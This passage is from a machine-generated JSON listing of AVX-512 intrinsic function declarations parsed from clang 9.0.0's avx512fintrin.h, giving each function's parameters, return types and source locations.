"/usr/lib/clang/9.0.0/include/avx512fintrin.h:4017:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4027:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4036:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_cvtpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4061:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4071:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvtpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4080:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_cvtsd_f64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4090:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm512_cvtss_f32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4096:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512" } }], "return-type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm512_unpackhi_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4104:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_unpackhi_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4111:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_unpackhi_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4119:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_unpacklo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4127:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_unpacklo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4134:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_unpacklo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4142:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_unpackhi_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4150:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_unpackhi_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4160:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_unpackhi_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4168:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_unpacklo_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4176:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_unpacklo_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4186:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_unpacklo_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4194:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_unpackhi_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4202:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_unpackhi_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4212:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_unpackhi_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4220:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_unpacklo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4228:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_unpacklo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4238:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_unpacklo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4246:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_unpackhi_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_unpackhi_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4261:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_unpackhi_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4269:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_unpacklo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4277:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_unpacklo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4284:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_unpacklo_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4292:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_loadu_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4303:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_loadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4312:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_loadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4321:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_loadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4330:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_loadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4339:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_loadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4348:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_loadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4356:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_loadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4365:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_loadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4373:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_loadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4382:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_loadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4390:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_loadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4399:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_loadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4408:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_load_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4417:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_load_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4423:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_load_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4431:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_load_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4440:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_load_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4446:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_load_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4454:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_load_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4463:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_load_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4469:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_load_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4475:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_storeu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4483:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_storeu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4492:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_storeu_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4499:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4508:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4517:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_storeu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4524:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_storeu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4530:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_storeu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4539:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_storeu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4546:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_store_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4555:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_store_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4561:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_mask_store_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4567:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_store_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4574:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_store_si512", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4580:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_store_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4586:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_store_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4592:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_knot", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4600:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }], "return-type": { "tag": "__mmask16" } }, { "tag": "function", "name": "_mm512_cvtepi8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4708:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_cvtepi8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4716:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_cvtepi8_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:4724:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": 